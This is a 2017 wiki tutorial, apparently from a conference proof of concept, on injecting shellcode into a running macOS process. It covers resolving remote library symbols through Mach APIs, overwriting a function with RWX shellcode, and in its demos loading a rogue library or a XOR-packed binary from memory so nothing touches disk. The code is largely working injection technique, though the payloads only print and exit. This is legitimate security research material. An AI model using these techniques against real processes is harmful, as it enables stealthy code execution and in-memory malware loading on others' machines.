Skip to content
Will Yee edited this page Dec 8, 2017 · 46 revisions

Simple Shellcode Development/Injection on macOS Using Remote Process Symbols

Background/Problem

Due to the way libraries are loaded on macOS, shellcode development can be difficult to accomplish on macOS thanks to its security features. For example, shellcode developers to leverage Kernel32 symbols in their shellcode knowing that the addresses will translate across processes. We will attempt to remedy this on macOS to come back to "feature parity" with Windows in terms of the ability to leverage arbitrary library symbols that will translate across processes when used in shellcode.

Solution

In order to reach "feature parity" with windows we must go through the following steps

  1. Find all the loaded libraries in a remote process
  2. Find all the MachO headers of the loaded libraries in a remote process
  3. Parse all the MachO headers of the loaded libraries in a remote process
  4. Find all the remote symbols from remote process libraries
  5. Use the remote symbols in shellcode
  6. Inject shellcode that use the remote symbols from the remote process
  7. Profit.

Finding All Loaded Libraries in a Remote Process

The first step in this process is to retrieve a list of the libraries loaded by the remote process. This is actually a fairly simple step. But first we need to lay the foundations of what system calls we're going to make and why we're using them.

Mach API

mach_vm_read_overwrite

kern_return_t remoteProcessRead(vm_map_t task, uint64_t address, uint8_t* pBuffer, size_t amountToRead)
{
    mach_vm_size_t dataCnt = 0;
    return mach_vm_read_overwrite(task,
                                  static_cast<mach_vm_address_t>(address),
                                  static_cast<mach_vm_size_t>(amountToRead),
                                  reinterpret_cast<mach_vm_address_t>(pBuffer),
                                  &dataCnt);
}

mach_vm_read_overwrite provides us the capability to read the memory space of a remote process. This will be useful in not just obtaining a list of all the loaded libraries but also for parsing the Mach headers of the libraries loaded by a remote process. We wrap this method in a remoteProcessRead to provide better readability.

mach_vm_write

kern_return_t remoteProcessWrite(vm_map_t task, uint64_t remoteAddress, uint8_t* pBuffer, size_t amountToWrite)
{
    return mach_vm_write(task, 
                         static_cast<mach_vm_address_t>(remoteAddress), 
                         reinterpret_cast<vm_offset_t>(pBuffer), 
                         static_cast<mach_msg_type_number_t>(amountToWrite));
}

mach_vm_write provides us the capability to write to the memory space of a remote process. This will be useful in writing our shellcode and our shellcode arguments over to the remote process. We wrap this method in a remoteProcessWrite to provide better readability.

mach_vm_allocate

kern_return_t remoteProcessAllocate(vm_map_t task, uint64_t& addressOfAllocatedMemory, size_t size)
{
    return mach_vm_allocate(task, &addressOfAllocatedMemory, size, VM_FLAGS_ANYWHERE);
}

mach_vm_allocate provides us the capability to allocate memory in the memory space of a remote process. This will be useful in allocating space for our shellcode arguments and any other additional payloads we want to inject into the remote process. We wrap this method in a remoteProcessAllocate to provide better readability.

Putting it together

Now that we have the basics of the Mach APIs we want to use, let's put them to use. The first bit that we need to do is query the remote process for the address of a metadata structure. This metadata structure will contain information on all the libraries loaded by the remote process.

mach_vm_address_t getImageInfos(vm_map_t targetTask, size_t& size)
{
    task_dyld_info_data_t task_dyld_info;
    mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT;

    if (task_info(targetTask, TASK_DYLD_INFO, (task_info_t)&task_dyld_info, &count))
    {
        exit(0);
    }

    size = task_dyld_info.all_image_info_size;
    return task_dyld_info.all_image_info_addr;
}

Our getImageInfos method will make a call to task_info which asks for the address to the struct dyld_all_image_infos structure. This structure contains an array of struct dyld_image_info that we will need to process.

kern_return_t find_all_binaries(pid_t pid, std::vector<std::pair<std::string, const uintptr_t>>& machHeaderAddresses, 
vm_map_t targetTask)
{
    size_t size = 0;
    mach_vm_address_t allImageInfos = getImageInfos(targetTask, size);
    struct dyld_all_image_infos allImages = { 0 };

    // Missing from the actual demo code, but should happen
   assert(sizeof(allImages) == size);

    remoteProcessRead(targetTask, allImageInfos, reinterpret_cast<uint8_t*>(&allImages), size);

    // Do proper allocations and checks
    ...

    remoteProcessRead(targetTask, 
                      reinterpret_cast<mach_vm_address_t>(allImages.infoArray), 
                      reinterpret_cast<uint8_t*>(pDyldImageInfoArray.get()), 
                      amountToRead);

    ...
}

This means that when we get the address the struct dyld_all_image_infos contained in the remote process, we need to do two remote process reads. One for retrieving the meta-data structure, and another one to actually read out the array of struct dyld_image_info. This array of struct dyld_image_info will contain the address of the libraries loaded by the remote process.

for (int j = 0; j < allImages.infoArrayCount; ++j)
{
    const struct dyld_image_info pImageInfo = (const struct dyld_image_info)pDyldImageInfoArray[j];

    ...

    uintptr_t machHeaderAddress = reinterpret_cast<uintptr_t>(pImageInfo.imageLoadAddress);

    //Do some processing with the MachO header or the imageLoadAddress
    ...
}

We will need to iterate over the array grabbing the imageLoadAddress field out of the struct dyld_image_info array element. Since imageLoadAddress is also the address of the MachO header, we will save this off along with the name of the loaded library for later use. Which brings us to our next section...

Parsing the Remote Library Headers

There are already plenty of resources for learning how to read/parse the MachO header, so we won't reinvent the wheel here and go over what's already been documented to death. Rather we will focus on what we want from the MachO header in order to achieve our solution.

struct mach_header {
  uint32_t      magic;
  cpu_type_t    cputype;
  cpu_subtype_t cpusubtype;
  uint32_t      filetype;
  uint32_t      ncmds;
  uint32_t      sizeofcmds;
  uint32_t      flags;
};
struct segment_command {
  uint32_t  cmd;
  uint32_t  cmdsize;
  char      segname[16];
  uint32_t  vmaddr;
  uint32_t  vmsize;
  uint32_t  fileoff;
  uint32_t  filesize;
  vm_prot_t maxprot;
  vm_prot_t initprot;
  uint32_t  nsects;
  uint32_t  flags;
};

...

struct symtab_command {
    uint32_t cmd;
    uint32_t cmdsize;
    uint32_t symoff;
    uint32_t nsyms;
    uint32_t stroff;
    uint32_t strsize;
}; 

In the MachO header we care about three particular fields. The ncmds field, the segname from struct segment_command and the struct symtab_command. In the case of the segname, we only care about the __TEXT and __LINKEDIT segments

void parseSymbolFromMachHeader(std::unique_ptr<uint8_t[]>& pMachHeaderBuffer, uintptr_t remoteMachHeaderAddress, 
vm_map_t targetTask)
{
    ...

    uint32_t nLoadCommands = pMachHeader->ncmds;

    struct segment_command_64* pLinkeditLoadCommand = nullptr;
    struct segment_command_64* pTextLoadCommand     = nullptr;
    struct symtab_command*     pSymtabCommand       = nullptr;

    ...

    for (uint32_t i = 0; i < nLoadCommands; ++i)
    {
        struct load_command* pLoadCommand = reinterpret_cast<struct load_command*>(tempAddress);
    
        switch (pLoadCommand->cmd)
        {
            case LC_SEGMENT_64:
            {
                struct segment_command_64* pCommand = reinterpret_cast<struct segment_command_64*>(tempAddress);
                std::string segname(pCommand->segname);
            
                if (segname == "__TEXT")
                {
                    pTextLoadCommand = pCommand;
                    if (processSlide == 0)
                    {
                        processSlide = remoteMachHeaderAddress - pCommand->vmaddr;
                    }
                }
            
                if (segname == "__LINKEDIT")
                {
                    pLinkeditLoadCommand = pCommand;
                }
            
                break;
            }
            case LC_SYMTAB:
            {
                // We'll save this for later...
                struct symtab_command* pCommand = reinterpret_cast<struct symtab_command*>(tempAddress);
                pSymtabCommand = pCommand;
                break;
            }
            
            default:
                break;
        }

        ...
}

As shown in the code snippet above, we iterate over the load commands until we fill out the three load commands we care about, the pLinkeditLoadCommand, the pTextLoadCommand, and the pSymtabCommand. Once we have those three load commands filled out, we're ready to find the remote process symbols.

Finding the Remote Symbols from Remote Process Libraries

Picking up from where we left off in parsing the MachO header, we now have the load commands of the LINKEDIT segment, the TEXT segment and the Symtab load command. Using these three load comamands, we can find the symbols for any arbitrary library that's been loaded by a remote process...

void parseSymbolFromMachHeader(std::unique_ptr<uint8_t[]>& pMachHeaderBuffer, uintptr_t remoteMachHeaderAddress, 
vm_map_t targetTask)
{

    // Everything from the previous section
    ...

    if (pLinkeditLoadCommand != nullptr && pTextLoadCommand != nullptr && pSymtabCommand != nullptr)
    {
        uint64_t slide = pLinkeditLoadCommand->vmaddr - pTextLoadCommand->vmaddr - pLinkeditLoadCommand->fileoff;
    
        uint64_t stringTableRemoteAddress = reinterpret_cast<uint64_t>(remoteMachHeaderAddress + slide + pSymtabCommand->stroff);
        uint64_t symbolTableRemoteAddress = reinterpret_cast<uint64_t>(remoteMachHeaderAddress + slide + pSymtabCommand->symoff);
    
        std::unique_ptr<uint8_t[]> pStringTable = std::make_unique<uint8_t[]>(pSymtabCommand->strsize);
        std::unique_ptr<struct nlist_64[]> pSymbolTable = std::make_unique<struct nlist_64[]>(pSymtabCommand->nsyms);
    
        // We need to dip back into the remote process to read the string area of the symbol table, and the symbols themselves
        kern_return_t kret = remoteProcessRead(targetTask, stringTableRemoteAddress, pStringTable.get(), pSymtabCommand->strsize);
        kret += remoteProcessRead(targetTask, symbolTableRemoteAddress, reinterpret_cast<uint8_t*>(pSymbolTable.get()), sizeof(struct nlist_64) * pSymtabCommand->nsyms);
    
        if (kret == KERN_SUCCESS)
        {
            for (uint32_t i = 0; i < pSymtabCommand->nsyms; ++i)
            {
                struct nlist_64* pSymbol = &pSymbolTable[i];
            
                if (pSymbol->n_value != 0)
                {
                    uint64_t symbolAddress = reinterpret_cast<uint64_t>(pSymbol->n_value + processSlide);
                    char* pSymbolName = reinterpret_cast<char*>(&pStringTable[pSymbol->n_un.n_strx]);
                
                    std::string symbolName(pSymbolName);
                    symbolsToAddressMap.insert({ symbolName, (uintptr_t)symbolAddress });
                }
            }
        }
    }
}

First we must calculate the segment slides. Dyld will slide the segments loaded by some value determined by libdyld. This is different from the process slide which is determined by the kernel. Therefore we have a process slide and a segment slide named processSlide and slide respectively. We use the segment slide to determine the actual remote address of the string table and the symbol table. Once we have both we read out both the remote string table and the remote symbol table of the remote library into our own process. Then we will iterate over the symbol table and retrieve the name of the symbol and it's real address which is ASLR'd by processSlide. Finally we have both the symbol name and actual address in the remote process. We save both off for later use.

Using Remote Process Symbols in Shellcode

Now that we have a list (actually a map) of addresses and symbols we can begin using them in our shellcode that we wish to inject into the remote process.

int32_t main(int32_t argc, char* argv[])
{
    // Set up
    ...

    find_all_binaries(pid, machHeaderAddresses, task);

    ...

    parseAllSymbols(machHeaderAddresses, task);

    uintptr_t remoteExitAddr   = symbolsToAddressMap["_exit"];
    uintptr_t remotePrintfAddr = symbolsToAddressMap["_printf"];
    uintptr_t remoteMyFunction = symbolsToAddressMap["_MyFunction"];

    ShellcodeArgs args;
    args.pExitProcess = reinterpret_cast<ExitProcess_t>(remoteExitAddr);
    args.pPrintf      = reinterpret_cast<Printf_t>(remotePrintfAddr);
    
    uint64_t remoteAllocatedShellcodeArgs = 0;
    ret +=  remoteProcessAllocate(task, remoteAllocatedShellcodeArgs, sizeof(ShellcodeArgs));
    ret += remoteProcessWrite(task, remoteAllocatedShellcodeArgs, reinterpret_cast<uint8_t*>(&args), sizeof(ShellcodeArgs));

    ...
}

Injecting Shellcode That use Remote Process Symbols

After getting a list of all the remote libraries and their symbols we use a ShellcodeArgs structure to fill with pointers. These pointers are pointers to the symbols _exit and _printf that live inside the remote process. We then use a remoteProcessAllocate to allocate space for our ShellcodeArgs structure and then use a remoteProcessWrite to write over the contents of our ShellcodeArgs into the remote process's address space.

int32_t main(int32_t argc, char* argv[])
{

    std::unique_ptr<uint8_t[]> pPatchedShellCode = std::make_unique<uint8_t[]>(SIZE_OF_SHELLCODE_MAYBE);

    ...

    // Inject ShellcodeArgs into remote process

    ...

    // Handle jump tables for release mode
    uint8_t* pLocalShellcode = (*(uint8_t*)Shellcode == JUMP_INSTR_X86) ? (uint8_t*)((size_t)Shellcode + SIZE_OF_JUMP_INSTR + (*(FunctionRouter*)Shellcode).addr) : (uint8_t*)Shellcode;
    
    // Patch the shell code with the address of the remote args
    memcpy(pPatchedShellCode.get(), pLocalShellcode, SIZE_OF_SHELLCODE_MAYBE);

    const uint32_t I_THINK_THE_SIG_IS_HERE_RANGE = 64;
    for (uint32_t i = 0; i < I_THINK_THE_SIG_IS_HERE_RANGE; ++i)
    {
        if (memcmp(&pPatchedShellCode[i], &g_ShellcodeSignature, sizeof(g_ShellcodeSignature)) == 0)
        {
            // Replace the signature with the correct address pointing to the remote shell code args
            ...
        }
    }

    ...

}

After injecting our ShellcodeArgs structure into the remote process, we must use its address in our shellcode. We do this by looking for a hardcoded signature value in our local shellcode. In order to understand why we do this we must look at the shellcode itself that lives in Shellcode.cpp

void Shellcode(void)
{     
     ShellcodeArgs* pArgs = (ShellcodeArgs*)(SHELLCODEARGS_SIGNATURE);

     pArgs->pPrintf(pArgs->modS, pArgs->helloWorldString);

     pArgs->pExitProcess(-1);
}

The shellcode dereferences pArgs which is a pointer to our ShellcodeArgs structure. We cast a SHELLCODEARGS_SIGNATURE to a ShellcodeArgs* and then use the pointers inside that structure to make calls to printf and exit. This is the code that will execute in the remote process.

So in order for the shellcode to execute directly we must replace SHELLCODEARGS_SIGNATURE with the correct address of the ShellcodeArgs structure that we injected into the remote process.

Finally we find an arbitrary symbol to overwrite in the remote process will the contents of our shellcode.

    ...

    // Now mark _MyFunction as RWX and copy over the shell code
    ret += remoteProcessMemoryProtect(task, remoteMyFunction, SIZE_OF_SHELLCODE_MAYBE, false, VM_PROT_ALL);
    
    // Blow away _MyFunction with our shell code
    ret += remoteProcessWrite(task, remoteMyFunction, pPatchedShellCode.get(), SIZE_OF_SHELLCODE_MAYBE);

    ...

We need to use a symbol in order to jump execution to our shellcode. It doesn't really matter how the shellcode gets executed as long as it does. In this example we do this by overwriting a symbol that we know will get called at a later time.

Finally, we can resume the process and let it continue to execute until it hits the shellcode we've injected

    ...

    // You only yolo once...
    task_resume(task);

    ...

Demos

Demo 2

What It Does

Demo 2 will use the symbols provided by libdyld.dylib that's in a remote process and use _dlopen in order to load and link a library that was not originally loaded by the remote process.

How It's Done

Accomplishing this is not difficult now that we have the symbols of libraries loaded by the remote process. Since libdyld.dylib is loaded by every process, we can use its symbols.

    ...

    find_all_binaries(pid, machHeaderAddresses, task);
    parseAllSymbols(machHeaderAddresses, task);
            
    uintptr_t remoteDlOpenAddr  = symbolsToAddressMap["_dlopen"];       

    ...

    ShellcodeArgs args;
    args.pDlopen            = reinterpret_cast<DlOpen_t>(remoteDlOpenAddr);

    ...

    // Inject shellcode args along with shellcode

    ...

We can adjust the structure of ShellcodeArgs to provide the path to the rogue library we wish to load

typedef struct _ShellcodeArgs
{
     DlOpen_t pDlopen;

     ...

    char path[76] = "/Users/test/Desktop/hushcon_poc_build/build/Debug/libSharedObjectPayload.so";
    char modS[28] = "Path: %s loaded at 0x%llx\n";
} ShellcodeArgs;

The shellcode which will execute in the remote process will look like this...

void Shellcode(void)
{    
    ShellcodeArgs* pArgs = (ShellcodeArgs*)(SHELLCODEARGS_SIGNATURE);

    void* pLoadedModule = pArgs->pDlopen(pArgs->path, RTLD_NOW);

    pArgs->pPrintf(pArgs->modS, pArgs->path, pLoadedModule);

    while (true) { }
}

Demo 3

What It Does

Demo 3 will use the symbol _NSCreateObjectFileImageFromMemory in the remote process to load a packed library that's injected from the attacking process. This allows the remote process to load and link a rogue library that doesn't exist one disk.

How It's Done

This demo is similar to demo 2, however instead of looking for _dlopen, we will look for _NSCreateObjectFileImageFromMemory, _NSAddressOfSymbol, _NSLookupSymbolInModule, and _NSLinkModule. Once we have all these symbols we can inject our packed binary and record its location in our ShellcodeArgs structure.

    uint64_t remoteAllocatedPackedbinary = 0;
    ret = remoteProcessAllocate(task, remoteAllocatedPackedbinary, g_BinaryDataSize);
    ret += remoteProcessWrite(task, remoteAllocatedPackedbinary, g_BinaryData, g_BinaryDataSize);
    args.pModuleLocation = (void*)remoteAllocatedPackedbinary;
    args.sizeOfModule = g_BinaryDataSize;

Take a look at Bin.cpp in Demo3 in order to see the packed binary data. We've also modified the structure of ShellcodeArgs to accommodate the new arguments

typedef struct _ShellcodeArgs
{
    Printf_t                 pPrintf;
    NSCreateObjectFile_t     pNSCreateObjectFile;
    NSLookupSymbolInModule_t pNSLookUpSymbol;
    NSLinkModule_t           pNSLinkModule;
    NSAddressOfSymbol_t      pNSAddressOfSymbol;

    void*    pModuleLocation;
    size_t   sizeOfModule;

    char empty[1] = "";
    char symbol[13] = "_DoSomething";

    ...

} ShellcodeArgs;

This new structure contains the function pointers to the symbols that we've looked up as long as a string that is the symbol that we wis to look up in the packed library.

This is what the shellcode we will be injecting into the remote process looks like

void Shellcode(void)
{
    ShellcodeArgs* pArgs = (ShellcodeArgs*)(SHELLCODEARGS_SIGNATURE);

    pArgs->pPrintf(pArgs->message);

    // First unpack the module
    uint8_t* pPackedModule = (uint8_t*)pArgs->pModuleLocation;
    for (uint32_t i = 0; i < pArgs->sizeOfModule; ++i)
    {
        pPackedModule[i] = pPackedModule[i] ^ MAGIC_MASK;
    }

    NSObjectFileImage img;

    pArgs->pNSCreateObjectFile(pPackedModule, pArgs->sizeOfModule, &img);

    NSModule unpackedModule = pArgs->pNSLinkModule(img, pArgs->empty, NSLINKMODULE_OPTION_NONE);

    NSSymbol nsDoSomethingSymbol = pArgs->pNSLookUpSymbol(unpackedModule, pArgs->symbol);

    DoSomethingFunction_t pDoSomethingFunction = (DoSomethingFunction_t)(pArgs->pNSAddressOfSymbol(nsDoSomethingSymbol));

    pDoSomethingFunction(5);

    while(true) { }
}

The shellcode will unpack the binary we've injected that's located at pModuleLocation and run our unpacking code. Then it will use the NS* APIs to link and load a library from memory. After that the symbol address to _DoSomething is located and the function call is made.

References

https://www.cylance.com/en_us/blog/running-executables-on-macos-from-memory.html https://lowlevelbits.org/parsing-mach-o-files/ https://ho.ax/posts/2012/02/resolving-kernel-symbols/ https://mirror.informatimago.com/next/developer.apple.com/documentation/DeveloperTools/Conceptual/MachORuntime/5rt_api_reference/chapter_11_section_6.html https://opensource.apple.com/source/dyld/dyld-433.5/